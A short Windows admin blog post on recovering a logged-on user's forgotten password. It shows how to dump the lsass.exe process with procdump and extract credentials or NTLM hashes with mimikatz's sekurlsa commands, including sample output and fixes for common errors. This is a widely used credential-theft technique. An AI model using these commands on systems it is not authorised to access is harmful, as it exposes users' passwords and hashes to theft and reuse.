Windows: Recover lost passwords from memory

Source: https://michlstechblog.info/blog/windows-recover-lost-passwords-from-memory/

Hi,

If a user is logged on and has forgotten their password, you can dump the LSA process (lsass.exe) and recover the password from the dump file. What can actually be recovered depends on the OS version and configuration: cleartext passwords are only present if a provider such as WDigest still caches them (off by default since Windows 8.1 / Server 2012 R2, and removable on older systems with KB2871997); otherwise you will typically get NTLM hashes rather than the password itself.

Two tools are needed:

  • Microsoft’s sysinternals procdump
  • mimikatz, a tool to play with Windows security. Take care when downloading precompiled binaries; better get the source code from GitHub and compile it yourself. It's very easy.

Let's start. Log in as a user with administrator permissions and dump the lsass process:

C:\>procdump.exe -accepteula -ma lsass.exe %TEMP%\lsass.dmp
ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

[09:53:48] Dump 1 initiated: C:\Users\user\AppData\Local\Temp\lsass.dmp
[09:53:55] Dump 1 writing: Estimated dump file size is 42 MB.
[09:53:55] Dump 1 complete: 42 MB written in 7.5 seconds
[09:53:56] Dump count reached.

Recover the lost information. Start the mimikatz interactive shell:

C:\> mimikatz.exe

To get help, type a double colon: :: alone lists the available modules, and sekurlsa:: lists the commands of the sekurlsa module.
Open the dump file:
mimikatz # sekurlsa::minidump C:\Users\user\AppData\Local\Temp\lsass.dmp
Switch to MINIDUMP : 'C:\Users\user\AppData\Local\Temp\lsass.dmp'

And get the lost information:

mimikatz # sekurlsa::logonPasswords

Mimikatz also supports Windows full and crash dumps and VMware .vmem files as input. To extract credentials from a raw memory image or a hibernation file, use the mimikatz offline plugin for Volatility.

It's also possible to read the login credentials directly from the running lsass process; this is the default when no minidump is loaded.

You need the debug privilege (SeDebugPrivilege) for this, otherwise ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) occurs (0x5 is ERROR_ACCESS_DENIED). mimikatz.exe must also match the architecture of the running OS (x86 or x64); a mismatch gives ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations. If LSA protection (RunAsPPL) is enabled, lsass runs as a protected process and neither procdump nor mimikatz can open it this way.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonPasswords

CAUTION: Be very careful when using this tool, because it exposes extremely sensitive data! In your workplace or country this tool may be classified as a hacking tool!

Michael
